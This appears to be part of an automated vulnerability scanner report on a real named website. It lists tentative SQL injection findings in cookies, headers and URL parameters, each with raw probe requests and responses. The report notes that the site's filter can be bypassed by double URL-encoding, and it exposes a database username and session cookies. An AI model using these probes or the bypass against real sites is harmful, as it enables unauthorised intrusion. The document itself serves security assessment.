Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/114-share-advanced-segment-google-analytics.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb%2527%2527; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Fri, 05 Nov 2010 23:38:43 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.93. http://www.analyticspros.com/blog/googleanalytics/114-share-advanced-segment-google-analytics.html [ki_t cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/114-share-advanced-segment-google-analytics.html

Issue detail

The ki_t cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_t cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/googleanalytics/114-share-advanced-segment-google-analytics.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11'; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 05:43:41 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/114-share-advanced-segment-google-analytics.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11''; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 05:43:42 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.94. http://www.analyticspros.com/blog/googleanalytics/114-share-advanced-segment-google-analytics.html [ki_t cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/114-share-advanced-segment-google-analytics.html

Issue detail

The ki_t cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_t cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the ki_t cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/googleanalytics/114-share-advanced-segment-google-analytics.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11%2527; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 05:45:35 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/114-share-advanced-segment-google-analytics.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11%2527%2527; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 05:45:36 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.95. http://www.analyticspros.com/blog/googleanalytics/114-share-advanced-segment-google-analytics.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/114-share-advanced-segment-google-analytics.html

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/googleanalytics/114-share-advanced-segment-google-analytics.html?itemid=70#comment&1%2527=1 HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 05:58:14 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/114-share-advanced-segment-google-analytics.html?itemid=70#comment&1%2527%2527=1 HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 05:58:16 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 05:58:18 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 05:58:18 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21425


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.96. http://www.analyticspros.com/blog/googleanalytics/115-analytics-toolbar-for-dma-known-issues.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/115-analytics-toolbar-for-dma-known-issues.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/googleanalytics/115-analytics-toolbar-for-dma-known-issues.html'?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 06 Nov 2010 06:00:11 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/115-analytics-toolbar-for-dma-known-issues.html''?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 06 Nov 2010 06:00:18 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:00:19 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:00:19 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22288


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.97. http://www.analyticspros.com/blog/googleanalytics/115-analytics-toolbar-for-dma-known-issues.html [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/115-analytics-toolbar-for-dma-known-issues.html

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/googleanalytics/115-analytics-toolbar-for-dma-known-issues.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 05:57:17 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/115-analytics-toolbar-for-dma-known-issues.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527%2527
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 05:57:18 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.98. http://www.analyticspros.com/blog/googleanalytics/115-analytics-toolbar-for-dma-known-issues.html [optimizelyEndUserId cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/115-analytics-toolbar-for-dma-known-issues.html

Issue detail

The optimizelyEndUserId cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the optimizelyEndUserId cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/googleanalytics/115-analytics-toolbar-for-dma-known-issues.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169';

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 05:53:34 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/115-analytics-toolbar-for-dma-known-issues.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169'';

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 05:53:36 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 05:53:40 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 05:53:40 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22270


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.99. http://www.analyticspros.com/blog/googleanalytics/60-ga-extended-segments-part-1.html [d4dad6935f632ac35975e3001dc7bbe8 cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/60-ga-extended-segments-part-1.html

Issue detail

The d4dad6935f632ac35975e3001dc7bbe8 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the d4dad6935f632ac35975e3001dc7bbe8 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/googleanalytics/60-ga-extended-segments-part-1.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=15
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb'; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Fri, 05 Nov 2010 23:39:56 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/60-ga-extended-segments-part-1.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=15
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb''; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Fri, 05 Nov 2010 23:39:58 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=103ed91c731dbf91fdf70a26e6f77494; path=/
Set-Cookie: apros2.0_tpl=apros2.0; expires=Wed, 26-Oct-2011 23:40:04 GMT; path=/
Last-Modified: Fri, 05 Nov 2010 23:40:04 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 28803


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.100. http://www.analyticspros.com/blog/googleanalytics/63-kintiskton-llc-in-google-analytics.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/63-kintiskton-llc-in-google-analytics.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/googleanalytics/63-kintiskton-llc-in-google-analytics.html'?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html?start=20
